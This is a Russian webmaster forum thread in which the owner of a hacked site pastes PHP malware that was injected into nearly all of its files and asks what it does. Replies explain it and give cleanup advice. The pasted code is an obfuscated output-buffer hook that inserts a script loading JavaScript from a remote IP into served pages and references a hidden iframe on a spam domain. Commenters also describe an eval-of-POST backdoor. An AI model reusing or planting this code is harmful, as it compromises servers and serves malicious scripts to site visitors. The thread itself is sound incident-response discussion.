- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Подскажите, как действует этот код:
П.С. Ломанули сайтик и напихали почти во все файлы...
Ифрейм - понятно... А вот верхний не могу понять что делает...
Весьма популярный скриптик. Он лишь работает с файлом "на лету". Внешне ничего не портит. Чего-то, связанного с mysql, не видно.
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzWXZjcmlwRndCdCUyMHNKS3NidGpyYyUzRFRydyUyRlRydyUyRlZ5OTRWeSUyRVl2MnJGWTQ3WXYlMkUyVnklMkVUcncxYnRqOUZ3QjVWeSUyRkZ3QmpyRllxc0pLdWVzSktyYnRqeSUyRUZ3Qmpzc0pLJTNFc0pLJTNDVHJ3JTJGc2NyckZZaXBzSkt0JTNFJykucmVwbGFjZSgvRndCfFRyd3xyRll8c0pLfFpma3xWeXxZdnxidGovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
function mp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;
\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;
}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;
$i>=0;
$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();
}ob_start('tmp_lkojfghx');
for($i=0;
$i<count($s);
$i++){ob_start($s[$i][0]);
echo $s[$i][1];
}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>
Пишут, что
не факт
надо base64_decode распаковать глянуть
не факт
надо base64_decode распаковать глянуть
Ребят вы шутите? Вам уже должно быть достаточно
Это значит что злоумышленник может выполнить любой код на вашем сервере. Считайте что у него полный доступ к Вашему сайту.
Ребят вы шутите? Вам уже должно быть достаточно
Это значит что злоумышленник может выполнить любой код на вашем сервере. Считайте что у него полный доступ к Вашему сайту.
Действительно. Простым пост-запросом он сдеалать что угодно. Остальной код - цветочки, для отвлечения внимания и получение трафика на партнерки.
закодировано там вот что
<script src=//94.247.2.195/jquery.js></scipt> хотя не факт что jQuery там лежит.
но это всё ерунда по сравнению с eval($_POST
:)
Подскажите как вычистить все полностью... Если останется пара файлов с этим кодом, то все, пипец?
Подскажите как вычистить все полностью... Если останется пара файлов с этим кодом, то все, пипец?
Лучше сделать бекап. Удалить все папки и ЗАНОВО установить двиг и импортнуть базу. И обязательно проверить права на папках.
по дате создания проще всего вычислять